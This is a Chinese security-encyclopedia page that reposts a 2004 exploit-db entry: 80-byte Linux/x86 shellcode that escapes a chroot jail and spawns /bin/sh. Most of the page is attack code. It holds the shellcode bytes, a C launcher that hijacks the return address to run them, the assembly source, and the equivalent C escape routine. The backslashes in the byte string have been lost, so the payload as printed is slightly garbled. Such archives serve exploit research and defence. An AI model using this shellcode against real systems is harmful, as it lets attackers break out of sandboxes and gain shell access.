Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)-安全小百科

Linux/x86 – Break chroot + execve(/bin/sh) Shellcode (80 bytes)

漏洞ID	1054620	漏洞类型
发布时间	2004-09-12	更新时间	2004-09-12
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Linux_x86	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/13454

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some    *
 * ideas how to make it smaller, but till then use this one.               *
 *                                         signed predator                 *
 *                                         linux registered user : 181116  *
 *                                         preedator(at)sendmail(dot)ru    *
 ***************************************************************************/

char sc[]="x31xc0x31xdbx31xc9xb0x17xcdx80xebx36x5ex88x46x0a"
          "x8dx5ex05xb1xedxb0x27xcdx80x31xc0xb0x3dxcdx80x83"
          "xc3x02xb0x0cxcdx80xe0xfaxb0x3dxcdx80x89x76x08x31"
          "xc0x88x46x07x89x46x0cx89xf3x8dx4ex08x89xc2xb0x0b"
          "xcdx80xe8xc5xffxffxff/bin/sh..";

int main(){
  int *ret=(int *)(&ret+2);
  printf("len : %dn",strlen(sc));
  *ret=(int)sc;
}


// Asm code
/*********************************************
 *int main(){                                *
 * __asm__(" xorl %eax,%eax           n"    *
 *	   " xorl %ebx,%ebx           n"    *
 *         " xorl %ecx,%ecx           n"    *
 *	   " movb $0x17,%al           n"    *
 *	   " int  $0x80               n"    *
 *         " jmp 0x36                 n"    *
 *         " popl %esi                n"    *
 *	   " movb %al,0xa(%esi)       n"    *
 *         " leal 0x5(%esi),%ebx      n"    *
 *	   " movb $0xed,%cl           n"    *
 *	   " movb $0x27,%al           n"    *
 *	   " int $0x80                n"    *
 *         " xorl %eax,%eax           n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    * 
 *	   " addl $0x2,%ebx           n"    *
 *         " movb $0xc,%al            n"    *
 *	   " int $0x80                n"    *
 *         " loopne -0x06             n"    *
 *         " movb $0x3d,%al           n"    *
 *	   " int $0x80                n"    *
 *	   " movl %esi,0x8(%esi)      n"    * 
 *         " xorl %eax,%eax           n"    * 
 *         " movb %al,0x7(%esi)       n"    *
 *         " movl %eax,0xc(%esi)      n"    *
 *         " movl %esi,%ebx           n"    *
 *         " leal 0x8(%esi),%ecx      n"    *
 *         " movl %eax,%edx           n"    *
 *         " movb $0xb,%al            n"    *
 *         " int $0x80                n"    *
 *         " call -0x3b               n"    *
 *         " .string "/bin/sh.."    n");  *
 *}                                          *
 *********************************************/ 

//C code
/**********************************************
*int main(){                                  *
*  char *sh[2]={"/bin/sh",NULL};              *
*  int gg=0xed                                *
*  mkdir("sh..",gg);			      *
*  chroot("sh..");			      *
*  while (gg!=0){                             *
*     chdir("..");gg--;                       *
*  }                                          *
* chroot("..");                               *
* execve(sh[0],sh,NULL);                      *
*}                                            *
***********************************************/

// milw0rm.com [2004-09-12]

相关推荐: Avant Browser Long HTTP Request Buffer Overflow Vulnerability

Avant Browser Long HTTP Request Buffer Overflow Vulnerability 漏洞ID 1099697 漏洞类型 Boundary Condition Error 发布时间 2003-08-21 更新时间 2003…

文章版权归作者所有，未经允许请勿转载。

THE END